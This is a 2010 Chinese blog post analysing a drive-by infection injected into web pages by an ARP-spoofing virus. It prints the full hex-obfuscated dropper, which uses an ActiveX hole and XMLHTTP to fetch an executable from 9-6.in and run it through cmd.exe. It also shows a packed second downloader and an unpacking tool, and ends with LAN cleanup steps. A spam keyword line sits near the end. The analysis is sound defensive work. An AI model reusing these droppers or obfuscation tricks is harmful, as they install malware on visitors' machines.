arp病毒利用的Javascript技術

2010-08-28 10:52:01來源：西部e網作者：

　　本文的目的是探討JS相關技術，并不是以殺毒為主要目的，殺毒只是為講解一些JS做鋪墊的，呵呵，文章有點長，倒杯咖啡或者清茶慢慢看，學習切勿急躁！

　　最近公司的網絡中了這兩天鬧的很歡的ARP病毒，導致大家都無法上網，給工作帶來了很大的不方便，在這里寫下殺毒的過程，希望對大家能有幫助！

　　現象：

　　打開部分網頁顯示為亂碼，好像是隨機的行為，但是看似又不是，因為它一直在監視msn.com，呵呵，可能和微軟有仇吧，繼續查看源代碼，發現頭部有一個js文件鏈接----<script src=http://9-6.in/n.js></script>；

　　來源：

　　經過一番網絡搜索，發現這個域名是印度域名，而IP地址卻是美國的，而且域名的注冊日期是7月25日，看來一切都是預謀好了的，還是不管這個了，先解決問題吧；

　　分析：

　　1、先把（http://9-6.in/n.js）這個JS文件下載下來，代碼如下：

　　其中第一句window.onerror=function(){return true;}就先把JS錯誤屏蔽掉，真夠狠的，呵呵，不這樣怎么隱藏自己呢，哈哈！然后還有個JS文件 http://9-6.in/S368/NewJs2.js，先繼續往下看，找到StartRun();運行一個函數，函數的主要作用是寫COOKIE，日期為保存一天，然后還用隱藏框架加載了一個文件（http://9-6.IN/s368/T368.htm），其余就沒有什么特別的了；

　　2、下載（http://9-6.in/S368/NewJs2.js）這個文件，代碼如下：

StrInfo =　"x3cx73x63x72x69x70x74x3ex77x69x6ex64x6fx77x2ex6fx6ex65x72x72x6fx72x3dx66x75x6ex63x74x69x6fx6ex28x29x7bx72x65x74x75x72x6e x74x72x75x65x3bx7dx3cx2fx73x63x72x69x70x74x3e" +" "+
　"x3cx73x63x72x69x70x74x3e" +" "+
　" x44x5ax3d'\x78x36x38\x78x37x34\x78x37x34\x78x37x30\x78x33x41\x78x32x46\x78x32x46\x78x33x39\x78x32x44\x78x33x36\x78x32x45\x78x36x39\x78x36x45\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x45\x78x36x35\x78x37x38\x78x36x35'x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　"x66x75x6ex63x74x69x6fx6e x47x6ex4dx73x28x6ex29 " +" "+
　"x7b " +" "+
　" x76x61x72 x6ex75x6dx62x65x72x4dx73 x3d x4dx61x74x68x2ex72x61x6ex64x6fx6dx28x29x2ax6ex3b" +" "+
　" x72x65x74x75x72x6e '\x78x37x45\x78x35x34\x78x36x35\x78x36x44\x78x37x30'x2bx4dx61x74x68x2ex72x6fx75x6ex64x28x6ex75x6dx62x65x72x4dx73x29x2b'\x78x32x45\x78x37x34\x78x36x44\x78x37x30'x3b" +" "+
　"x7d " +" "+
　" x74x72x79 " +" "+
　"x7b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x76x61x72 x42x66x3dx64x6fx63x75x6dx65x6ex74x2ex63x72x65x61x74x65x45x6cx65x6dx65x6ex74x28"\x78x36x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x29x3b" +" "+
　" x42x66x2ex73x65x74x41x74x74x72x69x62x75x74x65x28"\x78x36x33\x78x36x43\x78x36x31\x78x37x33\x78x37x33\x78x36x39\x78x36x34"x2c"\x78x36x33\x78x36x43\x78x37x33\x78x36x39\x78x36x34\x78x33x41\x78x34x32\x78x34x34\x78x33x39\x78x33x36\x78x34x33\x78x33x35\x78x33x35\x78x33x36\x78x32x44\x78x33x36\x78x33x35\x78x34x31\x78x33x33\x78x32x44\x78x33x31\x78x33x31\x78x34x34\x78x33x30\x78x32x44\x78x33x39\x78x33x38\x78x33x33\x78x34x31\x78x32x44\x78x33x30\x78x33x30\x78x34x33\x78x33x30\x78x33x34\x78x34x36\x78x34x33\x78x33x32\x78x33x39\x78x34x35\x78x33x33\x78x33x36"x29x3b" +" "+
　" x76x61x72 x4bx78x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x44\x78x36x39\x78x36x33\x78x37x32\x78x36x46\x78x37x33\x78x36x46\x78x36x36\x78x37x34\x78x32x45\x78x35x38"x2b"\x78x34x44\x78x34x43\x78x34x38\x78x35x34\x78x35x34\x78x35x30"x2c""x29x3b" +" "+
　" x76x61x72 x41x53x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x31\x78x36x34\x78x36x46\x78x36x34\x78x36x32\x78x32x45\x78x35x33\x78x37x34\x78x37x32\x78x36x35\x78x36x31\x78x36x44"x2c""x29x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x41x53x2ex74x79x70x65x3dx31x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x4bx78x2ex6fx70x65x6ex28"\x78x34x37\x78x34x35\x78x35x34"x2c x44x5ax2cx30x29x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x4bx78x2ex73x65x6ex64x28x29x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x4ex73x31x3dx47x6ex4dx73x28x39x39x39x39x29x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　" x76x61x72 x63x46x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x33\x78x37x32\x78x36x39\x78x37x30\x78x37x34\x78x36x39\x78x36x45\x78x36x37\x78x32x45\x78x34x36\x78x36x39\x78x36x43\x78x36x35\x78x35x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x34x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x2c""x29x3b" +" "+
　" x76x61x72 x4ex73x54x6dx70x3dx63x46x2ex47x65x74x53x70x65x63x69x61x6cx46x6fx6cx64x65x72x28x30x29x3b x4ex73x31x3d x63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2cx4ex73x31x29x3b x41x53x2ex4fx70x65x6ex28x29x3bx41x53x2ex57x72x69x74x65x28x4bx78x2ex72x65x73x70x6fx6ex73x65x42x6fx64x79x29x3b" +" "+
　" x41x53x2ex53x61x76x65x54x6fx46x69x6cx65x28x4ex73x31x2cx32x29x3b x41x53x2ex43x6cx6fx73x65x28x29x3b x76x61x72 x71x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x38\x78x36x35\x78x36x43\x78x36x43\x78x32x45\x78x34x31\x78x37x30\x78x37x30\x78x36x43\x78x36x39\x78x36x33\x78x36x31\x78x37x34\x78x36x39\x78x36x46\x78x36x45"x2c""x29x3b" +" "+
　" x6fx6bx31x3dx63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2b'\x78x35x43\x78x35x43\x78x37x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x33x33\x78x33x32'x2c'\x78x36x33\x78x36x44\x78x36x34\x78x32x45\x78x36x35\x78x37x38\x78x36x35'x29x3b" +" "+
　" x71x2ex53x48x65x4cx4cx45x78x65x63x75x74x65x28x6fx6bx31x2c'\x78x32x30\x78x32x46\x78x36x33 'x2bx4ex73x31x2c""x2c"\x78x36x46\x78x37x30\x78x36x35\x78x36x45"x2cx30x29x3b" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　"x7d " +" "+
　" x63x61x74x63x68x28x4dx73x49x29 x7b x4dx73x49x3dx31x3b x7d" +" "+
　" x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
　"x3cx2fx73x63x72x69x70x74x3e"
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65"](StrInfo);

　　這個代碼有點長哦，而且有保護措施，全部轉換為十六進制，不過不要害怕，我們有辦法解決，首先得確保你已經安裝了UE，然后打開UE，把代碼粘貼進去（廢話，呵呵），把x替換為%，然后用html代碼轉換功能，解碼，就可以得到第一次解碼的代碼，第一次？？？，呵呵，這個代碼的作者很變態的，做了兩次編碼，所以我得進行兩次解碼才行，重復剛才的步驟，然后你就可以看到最終的“原始”代碼了；

　　具體的代碼我就不帖出來了，有一定的危害性，相信大家看了上面的步驟都能自己找到代碼，這里之說一下比較核心的代碼吧；

//核心代碼
..............
　" var Bf=document.createElement("ojec ");" +" "+
　" Bf.setAttribute("classid","clsid:BD96C556-65A3-11D-983A-C4FC29E36");" +" "+
　" var Kx=Bf.CreateObject("Mic osof .X"+"MLHTTP","");" +" "+
　" var AS=Bf.CreateObject("Adod.S eam","");" +" "+
.............
　" var cF=Bf.CreateObject("Sc ip i g.FileSys emOjec ","");" +" "+
　" var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);" +" "+
　" AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("Shell.Applica io ","");" +" "+
　" ok1=cF.BuildPath(NsTmp+'\\sys em32','cmd.exe');" +" "+
　" q.SHeLLExecute(ok1,' /c '+Ns1,"","ope ",0);" +" "+
..............

　　上面的就是最為核心的代碼，利用MS0614漏洞、創建JS異步對象獲取病毒（*.exe）文件，然后運行，這樣就達到它的目的啦！

　　3、打開 http://9-6.IN/s368/T368.htm查看源代碼，又發現一段怪異的JS文件，如下：

　　可以看出這段代碼也是經過加密的了，特征為function(p,a,c,k,e,d)，這種加密方法網上有很多例子，我就不細說了，附上解密代碼：

//以下代碼為網上搜索所得，版權歸原作者所有
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "<html xmlns="<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>無標題文檔</title>
</head>
<body>
<script>
a=62;　
function encode() {
var code = document.getElementById('code').value;
code = code.replace(/[ ]+/g, '');
code = code.replace(/'/g, "file://'/");
var tmp = code.match(/(w+)/g);
tmp.sort();
var dict = [];
var i, t = '';
for(var i=0; i<tmp .length; i++) {
　 if(tmp[i] != t) dict.push(t = tmp[i]);
}
var len = dict.length;
var ch;
for(i=0; i<len; i++) {
　 ch = num(i);
　 code = code.replace(new RegExp('\b'+dict[i]+'\b','g'), ch);
　 if(ch == dict[i]) dict[i] = '';
}
document.getElementById('code').value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}("
　 + "'"+code+"',"+a+","+len+",'"+ dict.join('|')+"'.split('|'),0,{}))";
}
　
function num(c) {
return(c<a ?'':num(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36));
}
　
function run() {
eval(document.getElementById('code').value);
}
function decode() {
var code = document.getElementById('code').value;
code = code.replace(/^eval/, '');
document.getElementById('code').value = eval(code);
}
</script>
<textarea id=code cols=80 rows=20>
　
</textarea><br />
<input type=button onclick=encode() value=編碼/>
<input type=button onclick=run() value=執行/>
<input type=button onclick=decode() value=解碼/>
</body>
</html>

　　經過解密后代碼為：

info =　　　　"<script src="S368.jpg"></script>"
document.write(info)

　　繼續打開這個表面象圖片的鏈接，呵呵，當然不會是MM圖片了，查看源代碼，找到如下代碼：

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('E n=1c;12 13(){}12 14(){1d{n=1e 1f("\K\l\r\8\i\3\6\j\3\6\o\3\6\9\C\3\s\K\l\r\8\i\3\6\9\x")}1g(e){Q}E a=n["\15\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\R\7\q\3\v\5\4\l","");1h(a["\7\8\i\3\y\L\m"]("\z\f\l\4\5\9\3\y\3")!=-1){Q}E b=n["\15\3\4\j\3\6\o\3\6\v\5\4\l"]();b=b["\f\r\s\f\4\6"](0,2);b+="\\\v\6\d\k\6\5\J\x\\\K\l\r\8\i\3\J\x\\\1i\3\s\K\l\r\8\i\3\6\\\A\6\d\m\7\q\3\f\\\r\f\3\6\h\d\8\m\7\k\9\7\8\7";n["\j\3\4\p\5\q\q\s\5\h\1j\F\8\4\6\D"](1k,13);E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\7");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\5");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\s");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\h");E c=n["\w\i\i\p\5\4\3\k\d\6\D"]("\i");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\7","\S\f\h\6\7\A\4\16\o\5\6 \f\G\8\3\C \w\h\4\7\o\3\N\L\s\T\3\h\4\t\"\C\f\h\6\7\A\4\9\f\l\3\q\q\"\u\g\o\5\6 \d\G\8\3\C \w\h\4\7\o\3\N\L\s\T\3\h\4\t\"\f\l\3\q\q\9\5\A\A\q\7\h\5\4\7\d\8\"\u\g\o\5\6 \5\B\s\B\h\B\i\B\3\B\m\B\k\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\5","\H\g\f\9\U\r\8\t\"\p\V\\\\\v\6\d\k\6\5\J\x\\\\\I\8\4\3\6\8\J\x\\\\\I\F\N\v\17\L\U\F\9\F\N\F \l\4\4\A\1l\O\O\h\1m\x\W\7\18\O\j\X\19\1a\O\i\1n\C\18\Y\Y\W\l\4\Y\1o\"\B\H\B\H\u\g\f\9\U\r\8\t\"\h\z\i\9\3\y\3 \Z\h \4\6\3\3 \h\V\\\\ \Z\m\"\B\H\B\x\u\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\s","\f\9\j\A\3\h\7\5\q\R\d\q\i\3\6\f\t\"\1p\D\1q\d\h\r\z\3\8\4\f\"\u\g\s\G\s\9\f\r\s\f\4\6\7\8\k\t\H\B\s\9\q\5\f\4\I\8\i\3\y\L\m\t\"\\\\\"\u\u\g\s\P\G\"\\\\\q\d\h\5\q\f\J\x\\\\\K\3\z\A\d\6\J\x\\\\\p\d\8\4\3\8\4\9\I\F\1r\\\\\"\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\h","\d\9\1s\5\z\3\j\A\5\h\3\t\s\u\g\m\d\6\t\5\G\H\g\5\S\h\9\I\4\3\z\f\t\u\9\p\d\r\8\4\g\5\P\P\u\10 \o\5\6 \m\G\h\9\I\4\3\z\f\t\u\9\I\4\3\z\t\5\u\9\v\5\4\l\g\m\P\G\"\\\\\j\X\19\1a\1b\1t\x\1u\W\3\y\3\"\g");n["\j\3\4\p\d\8\m\7\k"]("\j\5\o\3\v\5\4\l","\i","\H\g\4\6\D\10\f\9\F\y\3\h\t\m\u\g\11\h\5\4\h\l\t\3\u\10\11\g\11\C\7\8\i\d\C\9\h\q\d\f\3\t\u\g\S\Z\f\h\6\7\A\4\16");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\v\6\d\4\3\h\4","\x");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\R\7\q\3\v\5\4\l","\h\V\\\C\7\8\i\d\C\f\\\f\D\f\4\3\z\X\1b\\\z\f\l\4\5\9\3\y\3");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\v\5\6\5\z\3\4\3\6",b);n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\F\y\4\17\7\f\4","\9\6\5\6\g\9\M\7\A\g\9\3\y\3\g\9\i\d\h\g\9\h\d\z\g\9\s\7\8\g\9\k\M\g\9\M\g\9\4\5\6\g\9\5\6\T\g\9\q\M\l\g\9\f\7\4\g\9\l\1v\y\g\9\4\k\M\g\9\i\q\q\g\9\d\h\y\g\9\o\s\y\g");n["\j\3\4\p\d\8\m\7\k"]("\w\8\4\7\o\7\6\r\f","\1w\f\3\6\j\3\4","\x");Q}14();',62,95,'|||x65|x74|x61|x72|x69|x6e|x2e||||x6f||x73|x3b|x63|
x64|x53|x67|x68|x66|odks63ls|x76|x43|x6c|x75|x62|x28|x29|x50|x41|
x31|x78|x6d|x70|x2c|x77|x79|var|x45|x3d|x30|x49|x7e|x54|x4f|x7a|
x58|x2F|x2b|return|x46|x3c|x6a|x52|x3a|x2E|x33|x6D|x2f|x7b|x7d|
function|assort_panel_enabled|pslcdkc|x47|x3e|x4c|x6E|x36|x38|x32|
null|try|new|ActiveXObject|catch|if|x57|x6b|106|x3A|x6B|x6F|x6C|x4d|
x44|x35|x4e|x5B|x5D|x71|x55'.split('|'),0,{}))

　　又是好長的代碼，又發現了function(p,a,c,k,e,r)，繼續解碼，代碼很長，請大家自己解碼查看吧，這里應用的還是上面的手法，用加密函數加密，然后轉換為十六進制，盡最大努力混淆我們的視線，來達到不可告人的目的，這里的代碼的主要作用是用另外一種方法下載病毒并運行，思想真的很先進，居然是去調用Web迅雷來下載病毒，然后去運行，作者真的是煞費苦心啊，應用了兩種方法下載病毒，“小樣，就不信毒不倒你！”，呵呵

　　殺毒：

　　說了半天只是分析了一下ARP病毒發作的時候在干什么，下面就說下關于殺毒的問題，其實現在網上有很多這方面的相關教程，我就簡單總結一下我的殺毒過程吧；

　　中了arp病毒必須要先找到中毒的機器

　　給這個機器斷網、殺毒

　　恢復局域網

　　其中第一步最關鍵了，如何才能找到呢？
在局域網隨便一臺客戶機上打開網上鄰居，查看工作組計算機，然后等到列表刷新出來后，迅速點擊開始-->運行-->cmd-->arp -a回車，如果機器比較多，請多輸入幾次arp -a，然后仔細查看，你會發現有一臺機器的Mac地址和網關的Mac地址相同，恭喜你，這就是那個毒源！
到這臺機器的跟前（呵呵，廢話真多），剩下的工作相信大家都有很多經驗了吧

　　殺毒！裝殺毒軟件或者進安全模式更甚者重裝機器，總之把病毒干掉就行了；

　　最后，到不能打開網頁的機器上執行這個命令：點擊開始-->運行-->cmd-->arp -d回車，然后就可以了。、

　　終于一切又恢復了平靜，是不是很有成就感呢，呵呵！

關鍵詞：病毒

成人午夜激情影院,小视频免费在线观看,国产精品夜夜嗨,欧美日韩精品一区二区在线播放

arp病毒利用的Javascript技術

相關閱讀:

贊助商鏈接: